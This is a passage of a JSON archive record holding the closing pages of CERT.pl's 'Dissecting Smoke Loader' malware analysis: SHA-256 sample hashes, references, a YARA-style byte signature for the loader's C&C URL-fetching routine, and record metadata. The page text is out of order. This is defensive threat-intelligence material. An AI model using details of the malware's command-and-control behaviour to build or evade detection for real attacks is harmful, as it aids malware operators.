af8d22d045f05b2d13373987\r\n8caf448ce78f753a7e975d2a116c52a22e29cc08f2a069c8324385f220e21b19\r\n40093a88a625abc6e289fd9389f0d7abb803f19f466c74a35031cb0bfa697460\r\n282d87939edbe0745176ae57a41282c34c8b98775784cd6dcd632906c14485a8\r\n28e0fbce1710c5a61a12499b489cb0ee5cc541127d9954635fcc541d56c90f79\r\nf5bcc7097663055d76cb51fc9bc6c39919fd078f13b01560a246ece1ca43df57\r\n1492c884cac74928521021b0d5a7994a9fd828fffc2c25963159f4d21371c169\r\n6f8f82731d2ae71265a39017df34643eac589b20552d64b15ec9f9f497acba8d\r\n20dce650c10545ae85005b3fe159df250c4f1275edfe4439e2d5a2d0515029de\r\n64e811e7ca2de7f5d52a0a95c960a31651db4c370da271e24b0bf86e7f19677e\r\n5cd1d95e5709b93b48747b3134f645ca40dfa0ecc099f34dc475488691d84048\r\n56472dcf4d3aa1c9419b1cc74eb892e4fdf82577712aece5f4a87144fe1b6f3d\r\n05f07a9f265f9c95a32ca59ad176be4098192802146968bb2c81a7fc7b529d2b\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 61 of 
63\n\n5bd0eeb537b5efb078e0df30416ddce1c35e204610a4ef104f842f7c93e835f3\r\n6a9c96b088b240d96f50dda3aa174410f6e41fda12f430c92a502fa2ac690d38\r\nbbd82e1bd5ed3b5678669e7aad23a64a950801fa2060f10d55f781c92b25e3a0\r\n1d469c16c72618a2bb40aa2f6a6b761dbb45b70dd440a9fa109bee61abbfbb0e\r\n92515d262bdda93f32d3fe8b93098021b2eaaccc995227b1bdb9bef125258cbe\r\ne22f05e70d58d2c5117feaf468462c939a5ec53fd33d7b8d47cf2b66d49ab94b\r\n49a84c74da18a04492c949a8758e2d28a82a99ac1bc8714aef04c684f2d82bdf\r\nabfa5ed1aff1bd75ecf138e08f841572a0bd4ed56db9cd44f5be5def96c0b665\r\n255cb851c6efc840d6c95de7e2ee53b6a0a77356d4d5f05488851ee02ccae256\r\n7368bfa34ebc092662ccaa7388e8a5586dbb9dc2de4ba5374bcb52793602c696\r\n1c3f68baa9a035a34f5dc6d5631541b359d4f94b3a47d4a965e3ca423461b608\r\n77bb011aafbf7a504fc33a28c18b5760f5d641168c8531bd51a3882aba0fb9f5\r\nc39125e9a0d4e0f33d0e9b0e508d2943fae48785426f78db6224a6a931e49886\r\n4e785dc121f563a9c235d494f10260d3f957c788f1ed45656238d782af8214a8\r\nc4f779558f7267d9ba0c5bd39ead0625fa56e3891f8c77d896eb9b769b7e5841\r\n4f1eee0cdd2a3ef82ce6aae645672fa75d01a081f06965ddbadf9fd7eae40e5d\r\nc89aab560b51adbd58fc44b42c96ef6324919bf1125a31b8631095f6f4c72416\r\n843c44649fe8cc572fd8b69e76165df8ea7db0ef9c323930a7440f6613cb6746\r\ne7448b7f9c2fbab65ea74adfa3bd8d05d839ed2acb2ade5288f120c3798fc271\r\nfafd41844f32be1835b59322182957434cf7fcb07a45da920ffa49f69c1404d6\r\nc1380d300afd41ac95b5145c3d281819b567d9fe1526dcba90d1e75e2e219ee1\r\n2489a4292c2c64e4aab56ec8d9b753e2e9da5b431136d866c2631a29851e7192\r\n1b6f51c84b5999eb881746b477bf59fa707f92e895ab02df8bc63c2691950694\r\n06a6ee1159eb8a14f78ccb260404ee4f9d315820aadf38c94e8cb64abe8925df\r\nReferences\r\n1\r\n https://grabberz.com/showthread.php?t=29680\r\n2\r\n https://web.archive.org/web/20160419010008/http://xaker.name/threads/22008/\r\n3\r\n http://stopmalvertising.com/rootkits/analysis-of-smoke-loader.html\r\n4\r\n 
http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 62 of 63\n\nhttps://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/\r\nSource: https://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 63 of 63\n\nauthor = strings: \"psrok1\"    \n$fetch_cnc_url1 = { 80 3d [4] ?? 76 ?? c6 05 [4] 01 3? ?? a0 [4] 8b }\n$fetch_cnc_url2 = { a1 [4] 83 f? ?? 75 ?? 3? ?? a3 [4] 5? 8b }\n   Page 37 of 63",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cert.pl/en/news/single/dissecting-smoke-loader/"
	],
	"report_names": [
		"dissecting-smoke-loader"
	],
	"threat_actors": [],
	"ts_created_at": 1775434678,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6d9215c5256d5e222d762c23d056c7ad6f7f89c6.pdf",
		"text": "https://archive.orkl.eu/6d9215c5256d5e222d762c23d056c7ad6f7f89c6.txt",
		"img": "https://archive.orkl.eu/6d9215c5256d5e222d762c23d056c7ad6f7f89c6.jpg"
	}
}